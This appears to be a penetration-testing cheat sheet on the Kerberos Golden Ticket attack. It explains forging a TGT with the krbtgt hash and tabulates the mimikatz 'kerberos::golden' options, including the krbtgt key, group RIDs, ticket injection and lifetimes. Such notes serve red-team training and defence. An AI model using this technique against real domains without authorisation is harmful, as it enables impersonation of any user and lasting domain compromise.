Golden Ticket
A Golden Ticket is a forged TGT that is signed and encrypted with the hash of the krbtgt account, which is what makes the KDC accept it as a valid TGT.
A Golden Ticket can be used to impersonate any user with any privileges.
Obtain krbtgt hash
There are multiple ways to get the krbtgt account hash.
Create The Ticket
Option | Description
---|---
kerberos::golden | Name of the module
/User:Administrator | Username for which the TGT is generated
/domain: | Domain FQDN
/sid: | SID of the domain
/aes256: | AES256 key of the krbtgt account
/id:500 /groups:512 | Optional user RID and group RIDs
/ptt or /ticket | /ptt injects the ticket into the current process; /ticket saves the ticket to a file
/startoffset:0 | Optional. Offset in minutes from now at which the ticket becomes valid; use a negative value for a ticket that became valid in the past and a larger positive value for one that becomes valid in the future.
/endin:600 | Optional ticket lifetime in minutes (default 10 years). The default AD setting is 10 hours = 600 minutes.
/renewmax:10080 | Optional maximum ticket lifetime with renewal, in minutes (default 10 years). The default AD setting is 7 days = 10080 minutes.